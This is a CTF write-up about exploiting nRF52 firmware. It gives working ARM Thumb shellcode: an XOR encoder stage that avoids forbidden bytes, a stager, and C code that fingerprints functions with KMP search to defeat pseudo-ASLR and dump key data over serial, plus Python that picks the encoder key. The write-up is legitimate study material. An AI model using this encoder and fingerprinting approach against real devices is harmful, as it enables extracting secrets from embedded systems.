The challenge

I don’t have the original statement so I’ll jump straight to the point.

You are given:

  • the firmware running on a nRF52.
  • a serial connection to the board and access to its buttons.

Basically the firmware allows you to write a shellcode and execute it (you are given these primitives). A third option in the firmware calls a verify function that displays the flag if a fixed location in memory has some magic value.

There are a few complications:

  • the shellcode cannot contain null byte or new line (0x00 / 0x0a)
  • the fixed memory location is marked read-only
  • the firmware on the board differs from the one given by a pseudo-ASLR + functions reordering. This prevents trivial jumps to the print flag function.
  • the hint dropped during the contest is the documentation of the processor.

TL;DR

  • Writing a Thumb shellcode encoder to prevent null bytes and new line
  • The shellcode must identify functions by fingerprinting in a randomized firmware
  • Code in C, have to handle linking/relocation
  • Probably would have worked
  • Not the intended solution

The final shellcode goes like:

  • Assembly stage 1:
    • XOR decodes the next stage with a passphrase to avoid invalid bytes
  • Assembly stage 2:
    • stores the looked for patterns
    • Call the C code with the resolved symbols (i.e the pointers to the patterns and the function)
  • C stage 3:
    • looks for the address of the write function and of the key data with the Knuth-Morris-Pratt algorithm
    • Call the write function to dump the key data

Choosing a solution

The problem statement and the hint points directly to a solution that would overwrite the magic location even though it’s read only.

Bad decision to make in a CTF but the problem can be done another way, more time consuming. Complications and fun, that’s what we’ll have.

How about pwning the ASLR and the binary reordering?

The idea is fairly simple: use function fingerprinting to recover interesting functions/data addresses in order to be able to call them. What’s not so simple is the shellcode restrictions as well as less than four hours to make it work.

Let’s be clear, I failed: too slow, poor choices in compilation options and some dubious instructions generated by gcc secured the loss. With half an hour more it would have been ok :(

In the end I don’t know if it would have worked on the final firmware as it’s not been released yet. Nevertheless, it does work with the given firmware when simulating things with Unicorn.

Retrieving the address of write and the key data

Note: the address of the print_flag (not the correct name) would have sufficed but doing without is more robust and barely consume more time.

Solving this step basically amounts to:

  • finding one address in the .text section
  • doing a strstr(text_addr, write_pattern_preamble) to find the interesting addresses.

For this to work, we assume that the code the generated code is not different for write, only that the functions addresses are scrambled. Also the key data section is adjacent to the .text section (i.e no page guard).

Finding one .text address

Trivial, the shellcode is called by a function residing in this section. Just looking at the link register (LR) at the beginning of the shellcode is enough.

Coding a strstr

In theory, nothing complicated. However in practice you might want:

  • speed: the .text section is 65ko, the CPU runs at 64MHz. Alright nevermind, I just wanted to use the KMP algorithm. Old habits die hard.
  • not code this thing in assembly

A quick implementation of KMP:

char *findit(char *start_addr, char *needle, int n) {
  int fail[111];
  fail[0] = -1;
  fail[1] = 0;
  int p = 0;
  for (int i = 1; i < n; ++i) {
    while (p != -1 && needle[p] != needle[i]) p = fail[p];
    ++p;
    fail[i + 1] = fail[p];
  }

  p = 0;
  int i = 0;
  while (1) {
    while (p != -1 && needle[p] != start_addr[i]) p = fail[p];
    ++p;
    if (p == n) return start_addr + i + 1 - n;
    ++i;
  }
}

Then the piping code that finds both the address of write and of the data section to finally dump all this data on the serial link by calling the write function.

typedef void (*write_func_t)(int, char *, int);
typedef char *(*findit_func_t)(char *, char *, int);

int solve(char *ret_addr, findit_func_t fx, int *data) {
  char *write_pattern = (char *)data[0];
  int n1 = data[1];
  char *key_pattern = (char *)data[2];
  int n2 = data[3];

  // +1 for thumb!
  char *write_addr = (*fx)(ret_addr, write_pattern, n1) + 1;
  char *key_addr = (*fx)(ret_addr, key_pattern, n2);
  write_func_t write_func = (write_func_t)write_addr;
  (*write_func)(1, key_addr, 0x300);
  return 123;
}

Ok, all is well but how do transform this into a shellcode. With a shared library (position independent), you end up with relocation sections and similar stuff. I don’t want to write an elf loader, no thanks.

So the (relatively) shortest path to victory I could think of was to have each function be self contained: all its dependencies are passed as arguments, not using .data. Another stage will have to put the code of these functions at known locations and call them properly.

This stage is done in the assembly below:

Stage 2

.section .text

.global _start

.code 16
.thumb:
.align
_start:
// Pushed n_key, pattern_key, n_write, pattern_write
// in an array on the stack
ldr %r0, n_key
push { %r0 }
adr %r0, pattern_key
push { %r0 }

ldr %r0, n_write
push { %r0 }
adr %r0, pattern_write
push { %r0 }


mov %r2, %sp

adr %r0, FUNC
ldr %r1, offset
add %r1, %r1, %r0

add %r1, #1
add %r0, #1

push { %r0 }
mov %r0, %lr
// Yes, blx + pop stuff would make the firmware survive the shellcode
pop { %pc }


// The ${...} will be replaced by some python code
// to obtain the final shellcode
// pattern_*: char[n_*] of the fingerprint of the write() or data section

.align
n_write:	.word  ${N_WRITE}
.align
pattern_write:	${PATTERN_WRITE}
.align
n_key:	.word  ${N_KEY}
.align
pattern_key:	 ${PATTERN_KEY}
.align
offset:	.word  ${FINDIT_FUNC_OFFSET}
.align
FUNC:

// After this, we will have:
// At FUNC: solve() function
// At FUNC+${FINDIT_FUNC_OFFSET}: findit() function

The only remaining problem is that all this code can 0x00 or 0x0A bytes. Since it’s thumb code, it’s not really hard to fix the offending instructions. For the data, it might be more annoying (looking at you n_write and n_key).

However, I am lazy, this would require manual work and it would not be reusable. So let’s prepend all this with an encoder stage.

ARM shellcode encoder

In metasploit, we can usually find payload encoders for x86 (Shikata Ga Nai to name one). Half a minute of googling and an empty net later, I settled for an XORed encoder with a passphrase.

The python code below illustrate the encryption/decryption process.

def encode(plaintext, key):
  for i,c  in enumerate(plaintext):
    yield c ^ key[i % len(key)]

The code below does the encryption of the code located after the label DATA, with len DATALEN and then jumps to the decoded stage. Nothing difficult, just the transcription of the python code in assembler that avoid forbidden bytes.

Stage 1

.section .text

.global _MAIN
.code 16	
.thumb:
.align	
_MAIN:
push { %r7 }
push { %r6 }
push { %r5 }
push { %r4 }
adr %r1, KEYLEN
ldrB %r1, [%r1]

adr %r3, DATALEN
ldrh %r3, [%r3]
adr %r0, KEY

eor %r4, %r4 
eor %r5, %r5 
adr %r2, DATA

label1: // main loop
ldrb %r6, [%r0]
ldrb %r7, [%r2]
eor %r6, %r6, %r7
strb %r6, [%r2]

add %r0, #1
add %r2, #1
add %r4, #1
add %r5, #1
cmp %r4, %r1
bne label_norekey
eor %r4, %r4 // poor man's modulo
adr %r0, KEY


label_norekey:
cmp %r5, %r3
bne label1


adr %r2, DATA
pop { %r4 }
pop { %r5 }
pop { %r6 }
pop { %r7 }
add %r2, #1 // thumb
mov %pc, %r2

.align
DATALEN: .hword ${DATALEN}
.byte 0xff // manual padding, don't want these to be null bytes
.byte 0xff
KEYLEN: .byte ${KEYLEN}
.byte 0xff
.byte 0xff
.byte 0xff

.align
KEY: ${KEY}
.align
DATA: 
.byte 0xaa
.byte 0xaa
.byte 0xaa
.byte 0xaa
.byte 0xaa
.byte 0xaa
.byte 0xaa
.byte 0xaa

Finally, before we can stitch everything together, it remains to select a passphrase that makes the encoded shellcode valid.

# find the key byte by byte

KEYLEN = 8
key=bytearray([0]* KEYLEN)
for i in range(KEYLEN):
  sx = set() # gather all bytes that will be encoded by the key i-th byte.
  for p in range(i, len(content), KEYLEN):
    sx.add(content[p])

  bad = set([0, 0xa]) # bytes that are invalid

  for cnd in range(256): # try every possible key byte
    if cnd in bad: continue # the key will end up in the shellcode as is.
    # thus it must not contain invalid bytes
    for v in sx:
      if (cnd ^v) in bad: break
    else:
      key[i] = cnd
      break
  else:
    assert 0
print('Selecting key ', key)

And that’s all. Stiching up all the pieces is not really the interesting part, you can find the details in the code on github. The function test2 is the one, test_payload simulates the execution with Unicorn engine.